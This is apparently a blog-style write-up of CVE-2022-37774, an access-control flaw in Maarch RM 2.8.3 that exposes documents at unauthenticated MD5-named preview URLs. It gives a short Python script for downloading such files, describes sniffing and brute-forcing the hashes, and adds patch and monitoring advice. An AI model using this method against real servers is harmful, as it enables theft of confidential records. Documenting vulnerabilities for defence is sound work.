CVE-2022-37774 - Exploiting Broken Access Control in Maarch RM 2.8.3 – How Private Documents Can Leak

In today’s digital world, keeping files and digital records private is critical. Maarch RM is a popular open source records management system used in many organizations to manage sensitive archives. In August 2022, researchers uncovered a dangerous broken access control vulnerability in Maarch RM version 2.8.3. Attackers can leverage this to access confidential PDFs and emails—even without logging in—just by knowing or guessing the right URL.

In this post, let’s break down how CVE-2022-37774 works, walk through a real-life example, and show how attackers can exploit this vulnerability with simple code. We’ll also cover where you can find more details and how to stay protected.

What is CVE-2022-37774?

CVE-2022-37774 is a security flaw in Maarch RM 2.8.3 that exposes private documents without proper authentication. Here’s how it happens:

The preview feature creates a temporary URL that looks like:

  https://{your-maarch-url}/tmp/{MD5 hash of the document}
  

- This preview link can be accessed without any login! If someone knows (or can guess) the MD5 hash, they could download confidential archives.

This is known as a broken access control issue. The application relies on obfuscated URLs (MD5 hashes) to “protect” access, but these are not secure enough for confidential files.

Exploiting the Vulnerability: Step by Step

Let’s walk through how an attacker might take advantage of this bug.

When you use Maarch RM to view a document, the app creates a link like this

https://records.company.com/tmp/a8f5f167f44f4964e6c998dee827110c

The long string (a8f5f167f44f4964e6c998dee827110c) is the MD5 hash of the document.

But the server does *not* check if the person visiting this URL is logged in or allowed to see the file. Anyone with the link can get the file.

Intercept Traffic: Attackers with network access can sniff web traffic to find these URLs.

- Brute-Forcing: If the files are common (like templates or standard forms), attackers can compute likely MD5 hashes of candidate files and check if they hit a valid URL.

3. Downloading the File

Once the attacker has the hash, grabbing the document is trivial.

Example exploit (Python)

import requests

# Set the server URL
server_url = "https://records.company.com/tmp/";
md5_hash  = "a8f5f167f44f4964e6c998dee827110c"  # known or guessed

file_url = server_url + md5_hash
resp = requests.get(file_url)

if resp.status_code == 200:
    with open("stolen_document.pdf", "wb") as f:
        f.write(resp.content)
    print("Document downloaded successfully!")
else:
    print("File not found or already expired.")

No login, no password—if the hash is valid, the document is yours.

Want to read more? Here are the official sources and advisories

- Original CVE database entry
- French CERT advisory: CERTFR-2022-AVI-915
- GitHub security advisory thread

Why MD5 Is Not Enough

MD5 is a fast cryptographic hash, but it’s *not* designed for securing secrets. MD5 hashes for common files can be brute-forced quickly. If documents are predictable (like a company employee handbook), it’s not hard to guess the right hash and download the file.

Bad practice

Relying on hidden URLs or hashed filenames is *never* a substitute for real access control. If the resource is important or private, always require authentication checks on every request.

Responsible Disclosure and Patching

This vulnerability was responsibly disclosed to the Maarch team, which issued updates and mitigations. If you use Maarch RM, make sure you upgrade to at least version 2.8.4 or higher.

- Download patched versions
- Follow the vendor's security instructions

Avoid relying on “obfuscated” URLs or filename hiding for security.

- Monitor server logs for unusual download patterns under /tmp/.

Conclusion

*CVE-2022-37774* is a stark example of how broken access control can quickly turn private record keeping solutions into data leaks. Always remember: hashes and secret URLs cannot replace real authorization checks. If you use Maarch RM 2.8.3 or older, update now before your sensitive documents become public.

Further Reading

- OWASP Broken Access Control


*Authored exclusively for you: A simple, practical guide to understanding and exploiting CVE-2022-37774 in Maarch RM.*

Timeline

Published on: 11/23/2022 00:15:00 UTC
Last modified on: 11/26/2022 03:33:00 UTC